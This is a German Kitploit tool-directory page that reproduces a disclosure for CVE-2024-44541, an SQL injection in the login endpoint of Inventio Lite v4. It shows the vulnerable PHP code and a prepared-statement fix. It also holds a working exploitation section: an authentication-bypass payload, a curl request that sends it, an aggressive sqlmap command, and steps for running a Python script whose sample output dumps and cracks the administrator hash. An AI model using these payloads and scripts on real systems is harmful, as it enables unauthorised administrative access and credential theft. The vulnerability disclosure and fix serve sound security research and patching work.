Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-44541 — Dieses Repository beschreibt eine SQL-Injection-Schwachstelle in Inventio Lite v4, einschließlich Exploit-Schritten und eines Python-Skripts zur Automatisierung des Angriffs. Es enthält Informationen zum anfälligen Code, empfohlene Fixes und dazu, wie administrative Anmeldeinformationen extrahiert und entschlüsselt werden können. | Kitploit
Tools/GitHubGitHub/pointedsec/cve-2024-44541
Passwort-CrackingSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubpointedsec/cve-2024-44541

CVE-2024-44541

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

vor 1 JahrNoch nicht geprüft

Dieses Repository beschreibt eine SQL-Injection-Schwachstelle in Inventio Lite v4, einschließlich Exploit-Schritten und eines Python-Skripts zur Automatisierung des Angriffs. Es enthält Informationen zum anfälligen Code, empfohlene Fixes und dazu, wie administrative Anmeldeinformationen extrahiert und entschlüsselt werden können.

Teilen

CVE-2024-44541: SQL-Injection-Schwachstelle in Inventio Lite v4

Beschreibung

Inventio Lite v4 ist im Endpunkt /action=processlogin anfällig für SQL-Injection (SQLi). Diese Schwachstelle ermöglicht es Angreifern, beliebige SQL-Abfragen über den Parameter username in POST-Anfragen einzuschleusen, was potenziell zu unbefugtem Zugriff und Datenextraktion führen kann.

Verwundbarer Code

Der verwundbare Code lautet wie folgt:

root@kitploit:~
if(!isset($_SESSION["user_id"])) {
    $user = $_POST['username'];
    $pass = sha1(md5($_POST['password']));

    $base = new Database();
    $con = $base->connect();
    $sql = "select * from user where (email= \"".$user."\" or username= \"".$user."\") and password= \"".$pass."\" and is_active=1";
    $query = $con->query($sql);
    $found = false;
    $userid = null;
    while($r = $query->fetch_array()){
        $found = true;
        $userid = $r['id'];
    }
}

Screenshot des verwundbaren Codes: Vulnerable Code

Behobener Code

Das Problem wird durch die Verwendung von Prepared Statements behoben:

root@kitploit:~
if(!isset($_SESSION["user_id"])) {
    $user = $_POST['username'];
    $pass = sha1(md5($_POST['password']));

    $base = new Database();
    $con = $base->connect();

    // Prepare the query
    $stmt = $con->prepare("
        SELECT * FROM user 
        WHERE (email = ? OR username = ?) 
        AND password = ? 
        AND is_active = 1
    ");

    // Bind parameters
    $stmt->bind_param("sss", $user, $user, $pass);

    // Execute query
    $stmt->execute();

    // Get result
    $result = $stmt->get_result();
    $found = false;
    $userid = null;

    while($r = $result->fetch_assoc()){
        $found = true;
        $userid = $r['id'];
    }

    // Close statement
    $stmt->close();
}

Ausnutzung

Auth-Bypass-Payload

Um diese Schwachstelle auszunutzen, verwenden Sie den folgenden Payload:

root@kitploit:~
user -> ") or 1=1-- - 
pass -> blablalba

Beispiel des Angriffs mit curl:

root@kitploit:~
$ curl -X POST http://192.168.1.51/inventio-lite/?action=processlogin -d 'username=%22%29%20or%201%3D1--%20-&password=blablabla' -v && echo ""

SQLMap-Beispiel

root@kitploit:~
$ sqlmap -u http://192.168.1.51/inventio-lite/?action=processlogin --data="username=*&password=*" --level 5 --risk 3 --dbms=mysql --dbs --prefix='")' --batch --dbs

Exploit-Skript

Um die Ausnutzung und die Extraktion des Administrator-Benutzernamens und des Passwort-Hashes zu automatisieren, können Sie das mitgelieferte Python-Skript sqli.py verwenden.

Sie können dieses Repository klonen:

root@kitploit:~
git clone https://github.com/pointedsec/CVE-2024-44541

Installieren Sie dann die Abhängigkeiten mit pip:

root@kitploit:~
pip install -r requirements.txt

Passen Sie die folgenden Variablen im Skript bei Bedarf an:

  • BASE_URL = "http://192.168.1.51/inventio-lite/"
  • PWD_DIC_PATH = "/usr/share/wordlists/rockyou.txt"

Führen Sie das Skript anschließend aus. Es extrahiert den Administrator-Benutzernamen und den Hash und versucht anschließend, den Hash mit dem Format SHA1(MD5(password)) zu knacken.

Beispielausgabe:

root@kitploit:~
$ python3 sqli.py 
[*] Checking if target is vulnerable
[+] Target Vulnerable!
[*] Dumping Administrator username...
[◤] Extracting Username: -> [email protected]
[/] Extracting Admin Password Hash: Final Admin Hash: 90b9aa7e25f80cf4f64e990b78a9fc5ebd6cecad
[+] Password Decrypted! -> [email protected]:admin
[*] Try to Log In with that username, if that doesn't work, try with some uppercase/lowercase combinations

Auswirkungen

Vertraulichkeit: Angreifer können die gesamte Datenbank auslesen und so vertrauliche Daten wie Benutzeranmeldedaten und persönliche Informationen offenlegen.

Integrität: Angreifer können die Authentifizierung umgehen und administrativen Zugriff erlangen, wodurch sie Daten ändern oder löschen können.

Referenzen

  • Inventio Lite GitHub Repository
  • https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-44541
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-44541
  • https://nvd.nist.gov/vuln/detail/CVE-2024-44541

Danksagungen

Dieser Schwachstellenbericht wurde von Andrés Del Cerro identifiziert. Für weitere Details kontaktieren Sie mich bitte unter [email protected]

Tool herunterladen